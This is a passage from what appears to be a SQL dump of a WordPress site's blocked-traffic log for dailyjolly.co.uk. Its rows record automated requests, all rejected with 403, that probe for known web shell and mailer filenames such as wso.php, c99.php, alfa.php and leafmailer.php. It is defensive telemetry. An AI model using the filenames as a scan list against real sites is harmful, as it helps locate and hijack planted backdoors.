AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','xg2qTaNdpwZuF9zsQfeBM16b',0,1674431404.0248,177,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/28.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','kvTKeSmJPYBsaO1CGjqXuMxi',0,1674431404.9650,179,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/.Wp-maiiler.phP','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','nJi1PEr46mVDM80qRNFdC75t',0,1674431405.9039,174,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/owl.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ewzToNpa7sv4n2LUB5KuYglJ',0,1674431406.8447,168,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-content/owl.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','eoV6JZCNHUR7wrdWjkS5FsYX',0,1674431407.7785,188,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-maiiler.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','UXQgmBaJOPWIVNZkTHod7SpE',0,1674431408.7373,221,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/send.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Yn0wI657m8jSPpeKLrXiqaxR',0,1674431409.7087,173,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/.Wp-maiiler.phP','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','QwdTy8rRq54E2eL0Mmj9hBnN',0,1674431410.6298,169,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/alexus.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','C1LlFcNsWS8Q9aD7bOmBKMVx',0,1674431411.5531,165,'','GET',403,0,700,0,1,'',0),('20.203.135.203',348882891,'','https://www.dailyjolly.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','ykoExc9I3tqpbhNvAreRQGUn',0,1674435767.7139,248,'','GET',403,0,700,0,1,'',0),('20.203.135.203',348882891,'','https://www.dailyjolly.co.uk/wp_wrong_datlib.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','7lYWJNUrCp5aqTXxyjceDoEv',0,1674435865.1014,222,'','GET',403,0,700,0,1,'',0),('20.203.135.203',348882891,'','https://www.dailyjolly.co.uk/beence.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','YGdfumDri3qSeJ8AbO2E1B0w',0,1674435944.5562,259,'','GET',403,0,700,0,1,'',0),('20.203.135.203',348882891,'','https://www.dailyjolly.co.uk/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','8tfPBvWR7LGAEQ4b1SszenVJ',0,1674436696.1913,212,'','GET',403,0,700,0,1,'',0),('20.203.135.203',348882891,'','https://www.dailyjolly.co.uk/wp-content/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','cegvQpitardhzYf218XDyFs3',0,1674436696.4934,218,'','GET',403,0,700,0,1,'',0),('20.203.135.203',348882891,'','https://www.dailyjolly.co.uk/wp-includes/wp-atom.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','fZw49Hs28oAJTyri0GYXxl3L',0,1674436779.1523,212,'','GET',403,0,700,0,1,'',0),('20.203.135.203',348882891,'','https://www.dailyjolly.co.uk/wp-includes/images/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','hknUXyBZLVCudqW5aj7NQ6b0',0,1674437102.1487,200,'','GET',403,0,700,0,1,'',0),('20.203.135.203',348882891,'','https://www.dailyjolly.co.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','vpkbu58BzlhX3NK19CfrI7nJ',0,1674437102.4147,187,'','GET',403,0,700,0,1,'',0),('20.203.135.203',348882891,'','https://www.dailyjolly.co.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','kyzpdYfJu68XSZEKgTmDo41M',0,1674437144.4884,236,'','GET',403,0,700,0,1,'',0),('20.203.135.203',348882891,'','https://www.dailyjolly.co.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','J8f7g2NbYTuVwGCjQZriP9Fx',0,1674437161.5475,209,'','GET',403,0,700,0,1,'',0),('20.203.135.203',348882891,'','https://www.dailyjolly.co.uk/wp-content/plugins/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','XzHQ49Y5AWJojmZgeahkLD2c',0,1674437988.8915,232,'','GET',403,0,700,0,1,'',0),('20.203.135.203',348882891,'','https://www.dailyjolly.co.uk/archives.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','Eo2iRIMvAtwF6Vf7O9P4GmKb',0,1674438203.8170,208,'','GET',403,0,700,0,1,'',0),('20.203.135.203',348882891,'','https://www.dailyjolly.co.uk/defau11.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','gYjCoRMZrJsPaT9wik42GEX7',0,1674438210.5682,215,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','QHutdDKirx6Ro7JNSVAYZ84L',0,1674440239.9238,375,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/xxx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','W9AP6Y4sMcwNxoulRCjLGvyg',0,1674440240.8515,204,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','fZjUi6woMKecSp92uLNFYl04',0,1674440241.4045,189,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/new.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Gh07nYf5R8sbPHWSqIdOgC3A',0,1674440242.1533,185,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','8GrexXFmdwIVjiLR94un1abW',0,1674440242.7445,194,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/alpha.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','8qYvADGn7Fkryj51sZMK4gHx',0,1674440243.3054,187,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','h8v1LNanGWDsM3lQ9OZYkfq7',0,1674440243.7119,189,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/send.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','dISrnRxMbP1QtU0gyNWZEcV8',0,1674440244.1203,175,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','7hLrQgiXzRl1vD0ZyPeHYWKx',0,1674440244.4937,211,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/leafmailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','u4fxFXsA7BLVMg6jtryHnG0O',0,1674440245.0710,164,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/sender.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','d3sAb0DlUYO19SuBZfiREQno',0,1674440245.3663,184,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/inbox.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','U0tXNhbnCkYRLvp3DzFPoliE',0,1674440245.8782,186,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ok21FTrJ6BfeA7mzvyc4Vhxt',0,1674440246.7734,361,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/ups.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','n9LsBbxiTmEHJhX0gIpVjC1a',0,1674440247.5640,177,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/media-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','DmJ7MwB9GzYULT2bxen0Ilar',0,1674440247.8923,180,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','7f8Zw1pRKt0LWkBhTP3D9nEO',0,1674440248.6062,250,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/test.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Lcf8aQP1ygN9uKUwZ7rAmkHh',0,1674440249.7201,183,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/srx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','kcYoAxUPinh3f9tl0m6gwvaD',0,1674440250.1728,180,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/1337.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','JRKn3SPOkVTj4UHNIlwgFxZX',0,1674440250.6981,203,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/doc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','iMLZDRlv9UGW7yHwjJ32I04q',0,1674440251.2300,171,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/xx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','eszYG8At6olK7wQ9ZEWOkxbN',0,1674440251.6167,189,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/XxX.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','6AtRU8qPjzQOS7E0mvpG9wWf',0,1674440252.3696,211,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Mgpd8NzrwjfXVWtSQihYA1y7',0,1674440252.7790,187,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/lf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','C9Rth2WVzu0A5IY7FymknxPs',0,1674440253.3571,218,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/alex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','s5M8XUz7FnLhVTNGPIDKywpj',0,1674440253.8448,193,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/marijuana.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','I6gZDkN7Je2E9C0K8XSaoQzd',0,1674440254.3751,184,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/gaza.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','upza6j7C3lgknQKXwqvAfSrG',0,1674440254.7843,202,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/wp-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Vpz3XTGx7tW6PHveoOrw2scm',0,1674440255.1215,182,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','0FBqeo8Pi2p3hORTaL5ZnuHX',0,1674440255.7046,216,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/3index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','PaKHXRGQJtEh6x1rZig5sFjn',0,1674440256.1655,170,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/wikindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','z8lfOvMrs2HNCmDWycpxS1Fi',0,1674440256.6262,216,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/wso1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','BMzueYrsZDxR0ojhwgUpNGLc',0,1674440257.1046,206,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ceg9VyiAqRvSFBNHL6hD2WmP',0,1674440257.5577,187,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/priv8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','dX5JbC2sEADYezjf7Flygi8B',0,1674440258.1247,176,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/bb.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','rHQMJNFCjSVqx0zUmiGy2gsd',0,1674440258.6434,165,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/m.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','MX71J30E2F6YPTihleWS5bUZ',0,1674440259.0067,167,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/Lux.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','LPEemSK9DYWN435Jz8FB2uhi',0,1674440259.5797,184,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/haxor.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','UxYs6Al7nhVJe0tcHimuOGgw',0,1674440260.0768,248,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/xleet.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','uEYTa6ImQU43phnxtZCyAbK5',0,1674440260.7054,188,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/0byte.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','TXkcnh8rMJl65x7VsoyEgR04',0,1674440261.1593,177,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/wp-content/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','rARSMQeG0vwcsDqKdOTmHhEg',0,1674440261.5717,231,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/sym.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','JFazEl8NkbKQx6sDihI4SmWA',0,1674440261.9775,194,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/sym403.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','xW40Kynp5mZSgTkD3wPtfjsz',0,1674440262.3659,158,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/xl.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','J2G4gqkpl6WeXdmKjwZvM7fD',0,1674440262.8205,191,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/symlink.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','8r0fnZuvXaDoHpt63QqSiLJ9',0,1674440263.1210,208,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','e7OVQLlhNo2wujB9X5irnTvR',0,1674440263.5880,192,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/404.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','OC17g2dWEziTIrnDaNx6RJ0L',0,1674440264.0282,169,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/403.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','drz2ptU5xqJyfujGEK1kS4iC',0,1674440264.5219,172,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/c99.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','jfU3pC7I9q6AS4WuxwHNR1Js',0,1674440264.9145,188,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/ok.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','RWDQPGS9VKNqpaZrhmyijIB5',0,1674440265.3832,167,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/0.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','AJ563nsyIruM1CoOpHS2jYm9',0,1674440265.9394,193,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ghNOXlFCJVeEQjbmyx9Icion',0,1674440266.4611,193,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/2.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','4J6nkI8MiSlPUhE1Tz5pXv2O',0,1674440267.1344,165,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/3.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','fbrAvQSPOpuBsaqtIhX8UVJy',0,1674440267.5005,189,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/4.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','pn0h6fEsGibz95LKcmYXCPSj',0,1674440267.8421,174,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/5.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','RCI96GlDNb0j8mMa2TFupriP',0,1674440268.2828,255,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/6.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','KsDzpP0TE8VO5hImRtCgdWwl',0,1674440268.8304,178,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/7.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 